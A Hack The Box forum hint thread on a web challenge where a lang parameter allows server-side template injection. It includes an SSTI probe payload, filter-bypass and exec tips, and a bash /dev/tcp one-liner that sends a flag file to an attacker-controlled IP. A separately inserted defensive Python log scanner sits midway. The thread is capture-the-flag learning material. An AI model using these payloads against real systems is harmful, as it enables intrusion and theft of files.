Breathtaking View Discussion [HTB] [WEB] [HINTS]

Let’s discuss Breathtaking View. Please do not share any flags or writeups.

The lang parameter is vulnerable to SSTI.

Check this source to prepare a payload.

Get some ideas here to bypass the word java filter.

For a reverse shell command, you can refer to this repository.

Is there an extra step to be done with the lang payload? None of the examples work.

There’s none. Just register, URL encode and put the payload in the lang parameter. Those websites don’t contain the final payload but you can mix them to obtain it.

Exclusive content is now available for Breathtaking View.

What is Exclusive Content?

You can still ask for help and specific hints in this thread.

Thanks. I still can’t see a processed string in the error page. Will keep trying!

Start trying with simple payloads.

__*${7*7}__::.x
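The probe above and the URL-encoding advice earlier in the thread are exactly what a defender wants to spot in access logs. The following is an added example, not code from the challenge or from any poster: a small Python scanner that pulls the lang parameter out of constructed combined-format log lines, URL-decodes it repeatedly (so single- and double-encoded probes are both caught), flags template-expression syntax that has no place in a language code, and shows the server-side allowlist lookup that removes the injection point. The log lines, the allowlist and the template names are assumptions made up for the example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (not from the challenge).  Line 2 is the
# single-encoded Thymeleaf-style probe, line 3 a double-encoded ${7*7}.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?lang=en HTTP/1.1" 200 1234
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /?lang=__%24%7B7*7%7D__%3A%3A.x HTTP/1.1" 500 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /?lang=%2524%257B7*7%257D HTTP/1.1" 500 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /?lang=fr&theme=dark HTTP/1.1" 200 1234
"""

# Assumed allowlist of language codes the application actually ships.
ALLOWED_LANGS = {"en", "fr", "de"}

# Expression-language syntax that never belongs in a language code:
# ${..}, #{..}, *{..}, @{..}, ~{..}, the __..__ preprocessing markers and
# the ::fragment selector used in Thymeleaf-style probes.
SSTI_PATTERN = re.compile(r"[\$#\*@~]\{|__.*__|::")

# Request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """URL-decode until the value stops changing (catches double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def lang_values(line):
    """Return every decoded value of the lang parameter in one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    # parse_qsl decodes one level; fully_decode handles any further levels.
    return [fully_decode(v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k == "lang"]


def classify(lang):
    """Label a decoded lang value: ok, unexpected_value or ssti_probe."""
    if SSTI_PATTERN.search(lang):
        return "ssti_probe"
    if lang not in ALLOWED_LANGS:
        return "unexpected_value"
    return "ok"


def scan_log(text):
    """Return (verdict, decoded_value) for every non-ok lang parameter."""
    findings = []
    for line in text.splitlines():
        for lang in lang_values(line):
            verdict = classify(lang)
            if verdict != "ok":
                findings.append((verdict, lang))
    return findings


def resolve_template(lang):
    """Server-side mitigation (assumed template names): the user-supplied value
    only selects an entry from a fixed table and is never spliced into the
    template name or expression that the engine evaluates."""
    return f"index_{lang}" if lang in ALLOWED_LANGS else "index_en"


if __name__ == "__main__":
    for verdict, value in scan_log(SAMPLE_LOG):
        print(f"{verdict}: {value!r}")
```

Running the block prints the two probe values; feeding the same lines through resolve_template shows the probes collapsing to the default template, which is the behaviour the vulnerable lang handling lacks.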

Do we need to upload nc?

No, actually. With an exec template injection payload and a proper reverse shell command you can get a reverse shell directly.

Is there a way to solve the challenge without a reverse shell? Gave up after I couldn’t create the right objects…

I am not sure, because the container doesn’t have useful binaries including nc, wget, curl. It’s very hard to transfer files even if you can execute commands. Directly getting a shell is possible. Can you execute commands?

Yes, you can pass subshell commands to the exec like: new String[] { "/bin/bash", "-c", "whatever command" }. (I think it’s better than just a command string.)

Anyway, huge wtf when I discovered that the challenge has a solution script inside, lol. And it doesn’t use a reverse shell, just Java code.

Really? Then what’s the way to get the flag without getting a reverse shell? I tried to copy the flag to the templates directory but I think the server doesn’t read from this directory. Probably the real templates are inside the jar file.

Same, I tried to read the flag, but couldn’t. Rev shell works though.

I found a way without getting shell like this:

bash -c cat${IFS}/flag*>&/dev/tcp/YOUR_IP/1234<&1

Listen on the port.

It’ll send the flag.

I was trying to read it without using listening port :stuck_out_tongue_winking_eye:

A little more research on Java built-in modules may help us to find the way you want. I’ll check it again later.

Yes, the Java is compiled into a jar file and that’s the server; no live modification can be done by us.

Without a rev shell some Java knowledge is required. java.io.File has a listFiles method to get file names. java.nio.Files has the method readAllLines. Now you just need to piece together code and ~templatify it. (Maybe in a single request or multiple.)

Thx!

(Do we even need the filenames here? /app/flag.txt is still there due to “COPY . /app” in the Dockerfile …)

Yeah… && rm /flag.txt is incorrect.
Why cp && rm when mv exists… I see really bad code practices on HTB :smiley: